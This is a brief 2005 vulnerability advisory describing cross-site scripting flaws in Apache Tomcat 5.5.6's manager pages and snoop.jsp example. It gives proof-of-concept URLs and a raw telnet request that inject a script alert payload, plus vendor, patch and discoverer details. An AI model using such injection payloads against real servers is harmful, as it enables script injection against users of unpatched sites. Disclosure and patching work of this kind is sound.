Apache Jakarta Tomcat Cross Site Scripting Vulnerabilities
===========================================================


Version
========

Apache Tomcat/5.5.6 running on Windows 2000 
(Other platforms may also be affected)


Exploiting
===========

http://192.168.0.23:8080/manager/html/<script>alert("Hallo")</script>
http://192.168.0.23:8080/manager/html/stop?path=<script>alert("Hallo")</script>
http://192.168.0.23:8080/manager/html/start?path=<script>alert("Hallo")</script>


Second one works without authentication, but should not be that easy to
exploit:

Telnet to port 8080 and paste the following:

<script>alert("Hallo")</script> /jsp-examples/snp/snoop.jsp HTTP/1.0


Vendor
======

http://jakarta.apache.org

Patch
=====

http://www.mail-archive.com/tomcat-dev@jakarta.apache.org/msg66978.html

Discovered
==========

03.Jan.2005
oliver karow
http://www.oliverkarow.de/research/jakarta556_xss.txt